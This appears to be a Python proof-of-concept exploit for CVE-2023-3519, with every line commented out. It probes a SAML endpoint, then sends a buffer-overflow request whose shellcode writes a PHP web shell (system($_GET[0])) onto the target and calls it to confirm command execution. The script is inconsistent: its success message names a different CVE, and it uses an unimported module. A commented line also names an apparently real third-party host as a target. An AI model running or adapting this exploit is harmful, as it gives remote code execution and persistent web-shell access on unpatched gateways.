# '''
# Function:
#     CVE-2023-3519
# Author:
#     花果山
# Wechat official account：
#     中龙 红客突击队
# Official website：
#     https://www.hscsec.cn/
# Email：
#     spmonkey@hscsec.cn
# Blog:
#     https://spmonkey.github.io/
# GitHub:
#     https://github.com/spmonkey/
# '''
# # -*- coding: utf-8 -*-
# # !/usr/bin/env python3
#
# import ssl
# import random
# import string
# import requests
# import binascii
# import socket
# from urllib.parse import urlparse
# from requests.packages.urllib3 import disable_warnings
# disable_warnings()
#
#
# class poc:
#     def __init__(self, url, proxies):
#         self.url = url
#         self.headers = {
#             'User-Agent': 'Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)',
#         }
#         self.value_list = []
#         self.result_text = ""
#         self.proxies = proxies
#
#     def host(self):
#         url = urlparse(self.url)
#         netloc = url.netloc
#         scheme = url.scheme
#         return netloc, scheme
#
#     def vuln1(self, netloc, scheme):
#         url = "{}://{}/saml/login".format(scheme, netloc)
#         data = {"SAMLRequest": """PHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiB4bWxuczpzYW1sPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0icGZ4NDFkOGVmMjItZTYxMi04YzUwLTk5NjAtMWIxNmYxNTc0MWIzIiBWZXJzaW9uPSIyLjAiIFByb3ZpZGVyTmFtZT0iU1AgdGVzdCIgRGVzdGluYXRpb249Imh0dHA6Ly9pZHAuZXhhbXBsZS5jb20vU1NPU2VydmljZS5waHAiIFByb3RvY29sQmluZGluZz0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmJpbmRpbmdzOkhUVFAtUE9TVCIgQXNzZXJ0aW9uQ29uc3VtZXJTZXJ2aWNlVVJMPSJodHRwOi8vc3AuZXhhbXBsZS5jb20vZGVtbzEvaW5kZXgucGhwP2FjcyI+CiAgPHNhbWw6SXNzdWVyPkE8L3NhbWw6SXNzdWVyPgogIDxkczpTaWduYXR1cmUgeG1sbnM6ZHM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPgogICAgPGRzOlNpZ25lZEluZm8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgIDxkczpTaWduYXR1cmVNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjcnNhLXNoYTEiLz4KICAgICAgPGRzOlJlZmVyZW5jZSBVUkk9IiNwZng0MWQ4ZWYyMi1lNjEyLThjNTAtOTk2MC0xYjE2ZjE1NzQxYjMiPgogICAgICAgIDxkczpUcmFuc2Zvcm1zPgogICAgICAgICAgPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8+CiAgICAgICAgICA8ZHM6VHJhbnNmb3JtIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8+CiAgICAgICAgPC9kczpUcmFuc2Zvcm1zPgogICAgICAgIDxkczpEaWdlc3RWYWx1ZT5BPC9kczpEaWdlc3RWYWx1ZT4KICAgICAgPC9kczpSZWZlcmVuY2U+CiAgICA8L2RzOlNpZ25lZEluZm8+CiAgICA8ZHM6U2lnbmF0dXJlVmFsdWU+QTwvZHM6U2lnbmF0dXJlVmFsdWU+CiAgPC9kczpTaWduYXR1cmU+CiAgPHNhbWxwOk5hbWVJRFBvbGljeSBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyIgQWxsb3dDcmVhdGU9InRydWUiLz4KICA8c2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0IENvbXBhcmlzb249ImV4YWN0Ij4KICAgIDxzYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPnVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphYzpjbGFzc2VzOlBhc3N3b3JkUHJvdGVjdGVkVHJhbnNwb3J0PC9zYW1sOkF1dGhuQ29udGV4dENsYXNzUmVmPgogIDwvc2FtbHA6UmVxdWVzdGVkQXV0aG5Db250ZXh0Pgo8L3NhbWxwOkF1dGhuUmVxdWVzdD4="""}
#         try:
#             result = requests.post(url=url, data=data, headers=self.headers, proxies=self.proxies, verify=False, timeout=10)
#             citrix_response = result.text
#             if "SAML Assertion verification failed; Please contact your administrator" in citrix_response:
#                 return True
#             else:
#                 if len(netloc.split(":")) > 1:
#                     port = int(netloc.split(":")[1])
#                 elif scheme == "http":
#                     port = 80
#                 elif scheme == "https":
#                     port = 443
#                 result1 = self.vuln2(netloc, scheme, port)
#                 return result1
#         except:
#             if len(netloc.split(":")) > 1:
#                 port = int(netloc.split(":")[1])
#             elif scheme == "http":
#                 port = 80
#             elif scheme == "https":
#                 port = 443
#             result1 = self.vuln2(netloc, scheme, port)
#             return False
#
#     def vuln2(self, netloc, scheme, port):
#         context = ssl.create_default_context()
#         context.check_hostname = False
#         context.verify_mode = ssl.CERT_NONE
#         hostname = netloc.split(":")[0]
#         char = ''.join(random.sample(string.ascii_letters + string.digits, 8))
#         cmd = "test" + char
#
#         def tweaked_url_encode(payload):
#             bytes_to_encode = b'\x00\x30\x90'
#             encoded = bytearray(b'')
#             for byte in payload:
#                 if byte in bytes_to_encode:
#                     encoded.extend('%{:02X}'.format(byte).encode('utf-8'))
#                 else:
#                     encoded.append(byte)
#             return bytes(encoded)
#
#         shellcode = b''
#         shellcode += f'/var/vpn/theme/{cmd}.php\x00'.encode()
#         shellcode += b'AAAAAAAAAAAAA'
#         shellcode += b'<?php+system($_GET[0]);+?>\x00'
#
#         shellcode += b'\x48\x89\xe7'
#         shellcode += b'\x48\x81\xef\xb0\x00\x00\x00'
#         shellcode += b'\xbe\x01\x02\x00\x00'
#         shellcode += b'\xba\xff\x01\x00\x00'
#         shellcode += b'\xb8\x05\x00\x00\x00'
#         shellcode += b'\x0f\x05'
#
#         shellcode += b'\x48\x89\xc7'
#         shellcode += b'\x48\x89\xe6'
#         shellcode += b'\x48\x81\xee\x8e\x00\x00\x00'
#         shellcode += b'\xba\x1a\x00\x00\x00'
#         shellcode += b'\xb8\x04\x00\x00\x00'
#         shellcode += b'\x0f\x05'
#
#         shellcode += b'\xb8\x06\x00\x00\x00'
#         shellcode += b'\x0f\x05'
#
#         shellcode += b'\x48\x83\xC4\x30'
#         shellcode += b'\x5d'
#         shellcode += b'\xc3'
#
#         shellcode_encoded = tweaked_url_encode(shellcode)
#
#         return_address = b'\x6d\xc1\xff\xff\xff\x7f\x00\x00'
#         return_address_encoded = tweaked_url_encode(return_address)
#
#         padding = b'A' * (168 - len(shellcode))
#         payload = shellcode_encoded + padding + return_address_encoded
#
#         request = b''
#         request += b'GET /gwtest/formssso?event=start&target='
#         request += payload
#         request += f' HTTP/1.1\r\nHost: {netloc}\r\n\r\n'.encode('utf-8')
#         print(request)
#         with socket.create_connection((hostname, port)) as sock:
#             with context.wrap_socket(sock) as ssock:
#                 ssock.send(request)
#                 result = requests.get(f'{scheme}://{netloc}/vpn/theme/{cmd}.php?0=echo%20{cmd}', headers=self.headers, proxies=self.proxies, verify=False)
#                 # for i in request.split(b"\n"):
#                 #     if b"\x00" in i.encode():
#                 #         i = re.sub(b"\\\\x", b"\\\\\\\\x", i.encode())
#                 #         i = i.decode()
#                 #     self.result_text += "\n                 {}".format(i)
#                 print(request)
#                 if cmd in result.text:
#                     self.result_text += """\n        [+]    \033[32m检测到目标站点存在敏感信息泄露漏洞 (CVE-2023-4966)\033[0m"""
#                     for i in request.split(b"\n"):
#                         if b"\x00" in i:
#                             i = re.sub(b"\x00", b"\\\\x00", i)
#                             i = i.decode()
#                         self.result_text += "\n                 {}".format(i)
#                     return True
#                 else:
#                     return False
#
#     def main(self):
#         all = self.host()
#         netloc = all[0]
#         scheme = all[1]
#         if self.vuln1(netloc, scheme):
#             return self.result_text
#         else:
#             return False
#
#
# if __name__ == "__main__":
#     # url = "https://testcloud.ccblifeamc.com:4430"
#     url = "http://127.0.0.1"
#     proxies = {
#         "http": None,
#         "https": None,
#     }
#     poc(url, proxies).main()
